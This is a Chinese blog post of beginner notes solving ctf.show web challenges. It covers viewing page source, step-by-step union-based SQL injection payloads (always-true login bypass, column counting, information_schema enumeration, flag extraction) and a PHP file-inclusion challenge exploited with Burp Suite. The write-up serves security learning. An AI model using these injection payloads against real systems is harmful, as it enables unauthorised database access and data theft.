小白刷题CTF show web方向

已于 2024-03-19 16:10:39 修改
阅读量452 收藏 5
点赞数 8
分类专栏: 学习笔记 文章标签: 网络安全
于 2024-03-12 16:15:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/strawberry47/article/details/136641310
版权
本文讲述了如何通过右键查看源代码、SQL注入技术分析数据库结构,以及使用BurpSuite抓包工具修改POST请求获取文件,涉及GETvsPOST请求的区别和文件包含漏洞的利用。
摘要由CSDN通过智能技术生成

web01

右键查看源代码,再使用在线解密,就可以得出答案了

web02 sql注入

  1. admin' or 1=1 或者 1 or 1=1可以登录
  2. 查询几个字段:1' or 1=1 order by 3 # 使用此语句,判断列数。
    order by 3不会出错,但是order by 4就没有显示了,因此判断共有3列。
    ORDER BY 子句中的数字(如 ORDER BY 4)通常表示按照查询结果中的第几个列进行排序,而不是列名。这意味着 ORDER BY 4 将根据查询结果中的第四列进行排序。
    在这里插入图片描述
  3. 使用-1' union select 1,2,3 # 判断回显的位置
    发现回显位置是2
    在这里插入图片描述
  4. 1' union select 1,database(),3# 查看数据库名称,发现是web2
  5. 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database(); # 查看数据库中的表,返回有 欢迎你,flag,user,说明一共有两个表,分别是flag和user
  6. 1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag';#查看列名,发现只有flag
  7. 1' union select 1,group_concat(flag),3 from web2.flag;# 显示数据,得到答案了
    在这里插入图片描述

补充知识:

  • group_concat(table_name) 是一个聚合函数,它将返回符合 WHERE 条件的所有表的名称,并用逗号分隔。
  • information_schema是一个标准的数据库系统中的元数据信息存储区域,它包含了关于数据库结构的信息,比如数据库、表、列、索引等的信息。
  • 万能密码:admin' or 1=1#

web03 利用burp抓包修改为POST

点进题目后,显示<?php include($_GET['url']);?>,需要用到burp抓包。(burp配置笔记

include()函数用于将指定文件的内容读取并执行。题目是在引导我们利用文件包含漏洞给url传递一个参数

  1. 抓包后,右击它,选择“Send to Repeater”。这样,这个请求就会出现在Repeater标签页中。
  2. 按照图片进行修改,完成后“go”。会在response中看见ctf_go_go_go这个文件
    ctfshow{bc86df47-9ba7-4755-b05d-3bad5eeb5741}
  3. 在url后面加上 /ctf_go_go_go,可以下载文件,打开后就是flag了

一些说明:

GET vs. POST 请求

在Web开发中,GET和POST是两种最常用的HTTP请求方法:

  • GET请求通常用于请求数据从服务器检索数据。数据被添加到URL中,因此有长度限制,而且所有的参数都对用户可见。
  • POST请求则用于向服务器提交数据,比如表单提交。数据在请求体中发送,不会出现在URL中,因此更适合提交敏感信息或大量数据。POST请求没有数据长度限制。
strawberry47
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
NSSCTFweb刷题记录
fivesheeptree的博客
07-12 338
如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。将json参数的值解码为,从而使得$json['x']的值等于"wllm"。通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组。
2023年最新网络安全面试题合集(附答案解析)
Forget_liu的博客
06-09 1690
为了拿到心仪的 Offer 之外,除了学好网络安全知识以外,还要应对好企业的面试。 作为一个安全老鸟,工作这么多年,面试过很多人也出过很多面试题目,也在网上收集了各类关于渗透面试题目,里面有我对一些问题的见解,希望能对大家有所帮助。
CTF刷题
m_de_g的博客
06-01 421
BugKu——SSTI 1、判断是否存在ssti漏洞 2*8=16 说明存在ssti漏洞 List item 2、开始模板注入 知道’’的类型是字符型。 3、接下来我们找其父类 找到父类,父类是’object’ 4、因为只有一个’父类’,需要加一个下标, 5、找父类下的所有子类 {{’’.class.bases[0].subclasses()}} 6、接下来使用脚本,跑出那个子类中含有os模块 运行find_func.py脚本 输入字符串的地方,把所有的子类将其放入到其中,然后模块的话,直接
BUUCTF WEB(12月刷题~)
A_dmin的博客
01-21 1981
BUUCTF WEB [RoarCTF 2019]Easy Java BUUCTF WEB [0CTF 2016]piapiapia BUUCTF WEB [CISCN2019 华北赛区 Day1 Web1]Dropbox BUUCTF WEB [CISCN2019 华北赛区 Day1 Web2]ikun BUUCTF WEB [BUUCTF 2018]Online Tool BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei BUUCTF WEB shrine
CTF BugKu平台——Crypto篇刷题记录(后续更新)
Aluxian_的博客
05-31 2965
CTF BugKu平台——Crypto篇抄错的字符 抄错的字符 描述: 老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗:QWIHBLGZZXJSXZNVBZW QW1h base64解码为 Ama BL92 base64解码为 _v ZXJ5 base64解码为 ery X2Nv base64解码为 _co b2w= base64解码为 ol flag{Aman_very_cool} 这题出的确实好u1s1 出题人完胜! ...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
ctfweb攻防工具-御剑1.5.7z
04-06
【御剑】是一款知名的Web安全扫描工具,常用于CTF(Capture The Flag)竞赛和网络安全检测。CTF是一种信息安全竞赛,参与者通过展示攻击与防御技术来争夺“旗标”,即获取或保护特定的信息资源。在这样的竞赛中,Web...
0基础小白怎么入门CTF,看这个就够了(附学习笔记、靶场、工具包下载)
z099164的博客
06-24 3221
0基础小白怎么入门CTF,看这个就够了(附学习笔记、靶场、工具包下载)
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!
qq_44005305的博客
11-12 203
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
网络安全技术面试问题
hdwlwang的博客
04-25 265
本文是为了方使各位小伙伴们,在面试中遇到的一问题。
CTF题目合集
cgygsw的博客
01-26 2589
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
2024届【校招】安全面试题和岗位总结(字节、百度、腾讯、美团等大厂)
热门推荐
Python_0011的博客
02-05 1万+
个人强烈感觉面试因人而异,对于简历上有具体项目经历的同学,个人感觉面试官会着重让你介绍自己的项目,包括但不限于介绍一次真实攻防/渗透/挖洞/CTF/代码审计的经历 => 因此对于自己的项目,面试前建议做一次复盘,最好能用文字描述出细节,在面试时才不会磕磕绊绊、或者忘了一些自己很得意的细节面试题会一直更新(大概,直到我毕业或者躺平为止吧...)包括一些身边同学(若他们同意的话)和牛客上扒拉下来的(若有,会贴出链接)还有自己的一些经历。
菜鸡的安全岗面试之路
蚁景网安学院
06-29 653
这两周才决定暂时不读研了,大四又基本没有课,于是开始就开始找实习了。一方面找合天的小姐姐帮我投了几个,一方面自己也投了一些。做安全的,大部分都会想着先投360吧,可是不幸的是,360的1...
HSCCTF 2024(WEB方向),附高频面试题合集
m0_61331491的博客
04-05 862
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
网络安全工程师面试时候被经常问的几个问题有哪些?
分享Python知识
04-01 767
网络安全工程师面试时候被经常问的几个问题有哪些?
ctfshow web4
hintll的博客
06-11 667
利用文件包含实现木马注入
ctf比赛web方向学习路线
最新发布
04-30
学习CTF比赛Web方向的路线一般如下: 1. 学习Web基础知识,包括HTTP协议、HTML、CSS、JavaScript、SQL等; 2. 掌握常见的Web漏洞,如SQL注入、XSS、CSRF等,了解其原理和防御方法; 3. 学习常见的Web框架,如Django、Flask等,了解其使用方法和安全机制; 4. 掌握常见的Web攻击工具,如Burp Suite、SQLMap等; 5. 参加CTF比赛,并解决相关的Web题目,不断提升自己的实战能力。 在学习过程中,可以通过在线课程、书籍、博客等方式获取相关的学习资源,也可以通过参加线下CTF比赛或者加入CTF社区来获取更多的学习经验和交流机会。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值